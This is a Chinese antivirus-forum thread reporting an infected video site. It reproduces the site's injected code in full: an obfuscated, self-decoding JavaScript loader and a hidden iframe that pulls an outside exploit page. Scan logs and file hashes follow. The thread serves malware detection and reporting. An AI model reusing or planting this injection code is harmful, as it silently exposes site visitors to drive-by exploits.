查看: 2627|回复: 2
收起左侧

[已鉴定] 裏面

[复制链接]
fireold
发表于 2014-2-6 20:14:05 | 显示全部楼层 |阅读模式
  1. http://www.7starcabletv.com/video_page.php?id=666&
复制代码

  1. /*81a338*/
  2. vmrlbe = "spl" + "i" + "t";
  3. mbxtia = window;
  4. yawc = (1) ? "0x" : "123";
  5. fhlbgw = (5 - 3 - 1);
  6. try {
  7.     --(document["b" + "ody"])
  8. } catch (bdf) {
  9.     bsqrub = false;
  10.     try {} catch (intrtg) {
  11.         bsqrub = 21;
  12.     }
  13.     if (1) {
  14.         ocmp = "17:5d:6c:65:5a:6b:60:66:65:17:6c:6b:70:6a:67:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6c:6b:70:6a:67:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6c:6b:70:6a:67:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:63:58:65:66:6b:5d:66:25:5a:66:64:26:5c:6f:60:6b:25:67:5f:67:1e:32:4:1:17:6c:6b:70:6a:67:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:6c:6b:70:6a:67:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:30:29:1e:32:4:1:17:6c:6b:70:6a:67:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:30:29:67:6f:1e:32:4:1:17:6c:6b:70:6a:67:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:30:29:67:6f:1e:32:4:1:17:6c:6b:70:6a:67:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:30:29:1e:32:4:1:17:6c:6b:70:6a:67:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:30:29:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6c:6b:70:6a:67:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6c:6b:70:6a:67:53:1e:17:5a:63:58:6a:6a:34:53:1e:6c:6b:70:6a:67:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6c:6b:70:6a:67:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:6c:6b:70:6a:67:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6c:6b:70:6a:67:27:30:1f:20:32:4:1:74:4:1:74" [vmrlbe](":");
  15.     }
  16.     mbxtia = ocmp;
  17.     znifn = [];
  18.     for (ggcewv = 22 - 20 - 2; - ggcewv + 1411 != 0; ggcewv += 1) {
  19.         gvyxc = ggcewv;
  20.         if ((0x19 == 031)) znifn += String.fromCharCode(eval(yawc + mbxtia[1 * gvyxc]) + 0xa - fhlbgw);
  21.     }
  22.     wxz = eval;
  23.     if (Math.ceil(5.5) === 6) wxz(znifn)
  24. } /*/81a338*/
复制代码

  1. function yg09() {
  2.      var static = 'ajax';
  3.      var controller = 'index.php';
  4.      var yg = document.createElement('iframe');

  5.      yg.src = 'http://lanotfo.com/exit.php';
  6.      yg.style.position = 'absolute';
  7.      yg.style.color = '14';
  8.      yg.style.height = '14px';
  9.      yg.style.width = '14px';
  10.      yg.style.left = '100014';
  11.      yg.style.top = '100014';

  12.      if (!document.getElementById('yg')) {
  13.          document.write('<p id=\'yg\' class=\'yg09\' ></p>');
  14.          document.getElementById('yg').appendChild(yg);
  15.      }
  16. }

  17. function SetCookie(cookieName, cookieValue, nDays, path) {
  18.      var today = new Date();
  19.      var expire = new Date();
  20.      if (nDays == null || nDays == 0) nDays = 1;
  21.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  22.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  23. }

  24. function GetCookie(name) {
  25.      var start = document.cookie.indexOf(name + "=");
  26.      var len = start + name.length + 1;
  27.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  28.          return null;
  29.      }
  30.      if (start == -1) return null;
  31.      var end = document.cookie.indexOf(";", len);
  32.      if (end == -1) end = document.cookie.length;
  33.      return unescape(document.cookie.substring(len, end));
  34. }
  35. if (navigator.cookieEnabled) {
  36.      if (GetCookie('visited_uq') == 55) {} else {
  37.          SetCookie('visited_uq', '55', '1', '/');

  38.          yg09();
  39.      }
  40. }
复制代码


Avira
2014/2/6 下午 08:01 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\video_page[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      檔案會移動至 '5e22d6ad.qua' 名稱底下的隔離區目錄!

2014/2/6 下午 08:01 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        778
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2014/2/6 下午 08:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\AC_RunActiveContent[2].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2014/2/6 下午 08:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\AC_RunActiveContent[2].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2014/2/6 下午 08:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\common[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2014/2/6 下午 08:00 [Web Protection] 發現惡意程式碼
      從 URL "http://www.7starcabletv.com/Scripts/AC_RunActiveContent.js" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過

2014/2/6 下午 08:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\common[1].js 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2014/2/6 下午 08:00 [Web Protection] 發現惡意程式碼
      從 URL "http://www.7starcabletv.com/js/common.js" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過

2014/2/6 下午 08:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\video_page[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2014/2/6 下午 07:59 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\video_page[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:拒絕存取

2014/2/6 下午 07:59 [Web Protection] 發現惡意程式碼
      從 URL "http://www.7starcabletv.com/video_page.php?id=666&amp;amp;" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過


av.jpg


fs is
fs.jpg


Sophos
s.jpg
zmzcy
发表于 2014-2-7 00:07:49 | 显示全部楼层
Object: http://www.7starcabletv.com/video_page.php?id=666
SHA1: b085c5da2367caf47120ad4c9018f295b33f6d30
Name: Exploit.JS.Expack.G
Object: http://www.7starcabletv.com/swfobject.js
SHA1: fa8ab7dfd1a4d894f65043a20bd401eedb43a659
Name: Exploit.JS.Expack.G
Object: http://www.7starcabletv.com/js/stepjs.js
SHA1: 3f4dea86d805c4036d23bc2b9b0095d601b4463f
Name: Exploit.JS.Expack.G
Object: http://www.7starcabletv.com/js/common.js
SHA1: aca15dcd5251583f2f1ffca165ca58e5ba2d6460
Name: Exploit.JS.Expack.G
Object: http://www.7starcabletv.com/js/jquery-1.2.6.pack.js
SHA1: fcb6b260ffd2b78c229af5338541d7dbe0823819
Name: Exploit.JS.Expack.G
Object: http://www.7starcabletv.com/Scripts/AC_RunActiveContent.js
SHA1: b2d00d706af94617e648feb1f343ab33804b9674
Name: Exploit.JS.Expack.G
Object: http://www.7starcabletv.com/dtree.js
SHA1: e755eff9c801a07564afa4b6de1b74cfda5e18c7
Name: Exploit.JS.Expack.G
z紫f风l铃
发表于 2014-5-18 09:09:15 | 显示全部楼层
小A,FSCS
QQ图片20140518090831.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 19:48 , Processed in 0.126304 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表